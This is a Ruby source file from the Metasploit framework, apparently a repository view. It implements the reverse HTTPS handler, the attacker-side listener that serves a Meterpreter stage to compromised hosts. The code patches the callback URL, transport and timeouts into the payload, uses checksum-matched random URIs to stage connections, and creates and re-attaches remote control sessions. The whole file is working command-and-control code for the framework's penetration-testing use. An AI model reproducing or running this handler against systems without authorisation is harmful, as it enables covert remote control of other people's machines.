root / lib / msf / core / handler / reverse_https.rb @ master
History | View | Annotate | Download (10.6 kB)
| 1 |
require 'rex/io/stream_abstraction'
|
|---|---|
| 2 |
require 'rex/sync/ref'
|
| 3 |
|
| 4 |
module Msf |
| 5 |
module Handler |
| 6 |
|
| 7 |
###
|
| 8 |
#
|
| 9 |
# This handler implements the HTTP SSL tunneling interface.
|
| 10 |
#
|
| 11 |
###
|
| 12 |
module ReverseHttps |
| 13 |
|
| 14 |
include Msf::Handler |
| 15 |
|
| 16 |
#
|
| 17 |
# Returns the string representation of the handler type, in this case
|
| 18 |
# 'reverse_http'.
|
| 19 |
#
|
| 20 |
def self.handler_type |
| 21 |
return "reverse_https" |
| 22 |
end
|
| 23 |
|
| 24 |
#
|
| 25 |
# Returns the connection-described general handler type, in this case
|
| 26 |
# 'tunnel'.
|
| 27 |
#
|
| 28 |
def self.general_handler_type |
| 29 |
"tunnel"
|
| 30 |
end
|
| 31 |
|
| 32 |
#
|
| 33 |
# Define 8-bit checksums for matching URLs
|
| 34 |
# These are based on charset frequency
|
| 35 |
#
|
| 36 |
URI_CHECKSUM_INITW = 92 |
| 37 |
URI_CHECKSUM_INITJ = 88 |
| 38 |
URI_CHECKSUM_CONN = 98 |
| 39 |
|
| 40 |
#
|
| 41 |
# Precalculated checkums as fallback
|
| 42 |
#
|
| 43 |
URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] |
| 44 |
|
| 45 |
#
|
| 46 |
# Map "random" URIs to static strings, allowing us to randomize
|
| 47 |
# the URI sent in the first request.
|
| 48 |
#
|
| 49 |
def process_uri_resource(uri_match) |
| 50 |
|
| 51 |
# This allows 'random' strings to be used as markers for
|
| 52 |
# the INIT and CONN request types, based on a checksum
|
| 53 |
uri_strip, uri_conn = uri_match.split('_', 2) |
| 54 |
uri_strip.sub!(/^\//, '') |
| 55 |
uri_check = Rex::Text.checksum8(uri_strip) |
| 56 |
|
| 57 |
# Match specific checksums and map them to static URIs
|
| 58 |
case uri_check
|
| 59 |
when URI_CHECKSUM_INITW |
| 60 |
uri_match = "/INITM"
|
| 61 |
when URI_CHECKSUM_INITJ |
| 62 |
uri_match = "/INITJM"
|
| 63 |
when URI_CHECKSUM_CONN |
| 64 |
uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) ) |
| 65 |
end
|
| 66 |
|
| 67 |
uri_match |
| 68 |
end
|
| 69 |
|
| 70 |
#
|
| 71 |
# Create a URI that matches a given checksum
|
| 72 |
#
|
| 73 |
def generate_uri_checksum(sum) |
| 74 |
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a |
| 75 |
32.times do |
| 76 |
uri = Rex::Text.rand_text_alphanumeric(3) |
| 77 |
chk.sort_by {rand}.each do |x|
|
| 78 |
return(uri + x) if Rex::Text.checksum8(uri + x) == sum |
| 79 |
end
|
| 80 |
end
|
| 81 |
|
| 82 |
# Otherwise return one of the pre-calculated strings
|
| 83 |
return URI_CHECKSUM_PRECALC[sum] |
| 84 |
end
|
| 85 |
|
| 86 |
#
|
| 87 |
# Initializes the HTTP SSL tunneling handler.
|
| 88 |
#
|
| 89 |
def initialize(info = {}) |
| 90 |
super
|
| 91 |
|
| 92 |
register_options( |
| 93 |
[ |
| 94 |
OptString.new('LHOST', [ true, "The local listener hostname" ]), |
| 95 |
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]) |
| 96 |
], Msf::Handler::ReverseHttps) |
| 97 |
|
| 98 |
register_advanced_options( |
| 99 |
[ |
| 100 |
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), |
| 101 |
OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcible shut down', (24*3600*7)]), |
| 102 |
OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', 300]) |
| 103 |
], Msf::Handler::ReverseHttps) |
| 104 |
end
|
| 105 |
|
| 106 |
#
|
| 107 |
# Toggle for IPv4 vs IPv6 mode
|
| 108 |
#
|
| 109 |
def ipv6 |
| 110 |
self.refname.index('ipv6') ? true : false |
| 111 |
end
|
| 112 |
|
| 113 |
#
|
| 114 |
# Create an HTTPS listener
|
| 115 |
#
|
| 116 |
def setup_handler |
| 117 |
|
| 118 |
comm = datastore['ReverseListenerComm']
|
| 119 |
if (comm.to_s == "local") |
| 120 |
comm = ::Rex::Socket::Comm::Local |
| 121 |
else
|
| 122 |
comm = nil
|
| 123 |
end
|
| 124 |
|
| 125 |
# Start the HTTPS server service on this host/port
|
| 126 |
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, |
| 127 |
datastore['LPORT'].to_i,
|
| 128 |
ipv6 ? '::' : '0.0.0.0', |
| 129 |
true,
|
| 130 |
{
|
| 131 |
'Msf' => framework,
|
| 132 |
'MsfExploit' => self, |
| 133 |
}, |
| 134 |
comm, |
| 135 |
datastore['SSLCert']
|
| 136 |
) |
| 137 |
|
| 138 |
# Create a reference to ourselves
|
| 139 |
obj = self
|
| 140 |
|
| 141 |
# Add the new resource
|
| 142 |
service.add_resource("/",
|
| 143 |
'Proc' => Proc.new { |cli, req| |
| 144 |
on_request(cli, req, obj) |
| 145 |
}, |
| 146 |
'VirtualDirectory' => true) |
| 147 |
|
| 148 |
self.conn_ids = []
|
| 149 |
|
| 150 |
uhost = datastore['LHOST']
|
| 151 |
uhost = "[#{uhost}]" if Rex::Socket.is_ipv6?(uhost) |
| 152 |
print_status("Started HTTPS reverse handler on https://#{uhost}:#{datastore['LPORT']}/")
|
| 153 |
end
|
| 154 |
|
| 155 |
#
|
| 156 |
# Simply calls stop handler to ensure that things are cool.
|
| 157 |
#
|
| 158 |
def cleanup_handler |
| 159 |
stop_handler |
| 160 |
end
|
| 161 |
|
| 162 |
#
|
| 163 |
# Basically does nothing. The service is already started and listening
|
| 164 |
# during set up.
|
| 165 |
#
|
| 166 |
def start_handler |
| 167 |
end
|
| 168 |
|
| 169 |
#
|
| 170 |
# Removes the / handler, possibly stopping the service if no sessions are
|
| 171 |
# active on sub-urls.
|
| 172 |
#
|
| 173 |
def stop_handler |
| 174 |
self.service.remove_resource("/") if self.service |
| 175 |
end
|
| 176 |
|
| 177 |
attr_accessor :service # :nodoc: |
| 178 |
attr_accessor :conn_ids
|
| 179 |
|
| 180 |
protected |
| 181 |
|
| 182 |
#
|
| 183 |
# Parses the HTTPS request
|
| 184 |
#
|
| 185 |
def on_request(cli, req, obj) |
| 186 |
sid = nil
|
| 187 |
resp = Rex::Proto::Http::Response.new |
| 188 |
|
| 189 |
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
| 190 |
|
| 191 |
lhost = datastore['LHOST']
|
| 192 |
|
| 193 |
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
|
| 194 |
if lhost.empty? or lhost == '0.0.0.0' or lhost == '::' |
| 195 |
lhost = Rex::Socket.source_address(cli.peerhost) |
| 196 |
end
|
| 197 |
|
| 198 |
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) |
| 199 |
|
| 200 |
uri_match = process_uri_resource(req.relative_resource) |
| 201 |
|
| 202 |
# Process the requested resource.
|
| 203 |
case uri_match
|
| 204 |
when /^\/INITJM/ |
| 205 |
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) |
| 206 |
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" |
| 207 |
#$stdout.puts "URL: #{url.inspect}"
|
| 208 |
|
| 209 |
blob = ""
|
| 210 |
blob << obj.generate_stage |
| 211 |
|
| 212 |
# This is a TLV packet - I guess somewhere there should be API for building them
|
| 213 |
# in Metasploit :-)
|
| 214 |
packet = ""
|
| 215 |
packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00" |
| 216 |
packet << [url.length+8, 0x1000a].pack('NN')+url |
| 217 |
packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN') |
| 218 |
packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN') |
| 219 |
blob << [packet.length+8, 0].pack('NN') + packet |
| 220 |
|
| 221 |
resp.body = blob |
| 222 |
conn_ids << conn_id |
| 223 |
|
| 224 |
# Short-circuit the payload's handle_connection processing for create_session
|
| 225 |
create_session(cli, {
|
| 226 |
:passive_dispatcher => obj.service,
|
| 227 |
:conn_id => conn_id,
|
| 228 |
:url => url,
|
| 229 |
:expiration => datastore['SessionExpirationTimeout'].to_i, |
| 230 |
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i, |
| 231 |
:ssl => false |
| 232 |
}) |
| 233 |
|
| 234 |
when /^\/A?INITM?/ |
| 235 |
|
| 236 |
url = ''
|
| 237 |
|
| 238 |
print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
|
| 239 |
resp['Content-Type'] = 'application/octet-stream' |
| 240 |
|
| 241 |
blob = obj.stage_payload |
| 242 |
|
| 243 |
# Replace the transport string first (TRANSPORT_SOCKET_SSL
|
| 244 |
i = blob.index("METERPRETER_TRANSPORT_SSL")
|
| 245 |
if i
|
| 246 |
str = "METERPRETER_TRANSPORT_HTTPS\x00"
|
| 247 |
blob[i, str.length] = str |
| 248 |
end
|
| 249 |
print_status("Patched transport at offset #{i}...")
|
| 250 |
|
| 251 |
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) |
| 252 |
i = blob.index("https://" + ("X" * 256)) |
| 253 |
if i
|
| 254 |
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" |
| 255 |
blob[i, url.length] = url |
| 256 |
end
|
| 257 |
print_status("Patched URL at offset #{i}...")
|
| 258 |
|
| 259 |
i = blob.index([0xb64be661].pack("V")) |
| 260 |
if i
|
| 261 |
str = [ datastore['SessionExpirationTimeout'] ].pack("V") |
| 262 |
blob[i, str.length] = str |
| 263 |
end
|
| 264 |
print_status("Patched Expiration Timeout at offset #{i}...")
|
| 265 |
|
| 266 |
i = blob.index([0xaf79257f].pack("V")) |
| 267 |
if i
|
| 268 |
str = [ datastore['SessionCommunicationTimeout'] ].pack("V") |
| 269 |
blob[i, str.length] = str |
| 270 |
end
|
| 271 |
print_status("Patched Communication Timeout at offset #{i}...")
|
| 272 |
|
| 273 |
resp.body = blob |
| 274 |
|
| 275 |
conn_ids << conn_id |
| 276 |
|
| 277 |
# Short-circuit the payload's handle_connection processing for create_session
|
| 278 |
create_session(cli, {
|
| 279 |
:passive_dispatcher => obj.service,
|
| 280 |
:conn_id => conn_id,
|
| 281 |
:url => url,
|
| 282 |
:expiration => datastore['SessionExpirationTimeout'].to_i, |
| 283 |
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i, |
| 284 |
:ssl => true |
| 285 |
}) |
| 286 |
|
| 287 |
when /^\/(CONN_.*)\// |
| 288 |
resp.body = ""
|
| 289 |
conn_id = $1
|
| 290 |
|
| 291 |
if true # if not self.conn_ids.include?(conn_id) |
| 292 |
print_status("Incoming orphaned session #{conn_id}, reattaching...")
|
| 293 |
conn_ids << conn_id |
| 294 |
|
| 295 |
create_session(cli, {
|
| 296 |
:passive_dispatcher => obj.service,
|
| 297 |
:conn_id => conn_id,
|
| 298 |
:url => "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00", |
| 299 |
:expiration => datastore['SessionExpirationTimeout'].to_i, |
| 300 |
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i, |
| 301 |
:ssl => true |
| 302 |
}) |
| 303 |
end
|
| 304 |
else
|
| 305 |
print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
|
| 306 |
resp.code = 200
|
| 307 |
resp.message = "OK"
|
| 308 |
resp.body = "<h3>No site configured at this address</h3>"
|
| 309 |
end
|
| 310 |
|
| 311 |
cli.send_response(resp) if (resp)
|
| 312 |
|
| 313 |
# Force this socket to be closed
|
| 314 |
obj.service.close_client( cli ) |
| 315 |
end
|
| 316 |
|
| 317 |
|
| 318 |
end
|
| 319 |
|
| 320 |
end
|
| 321 |
end
|
| 322 |
|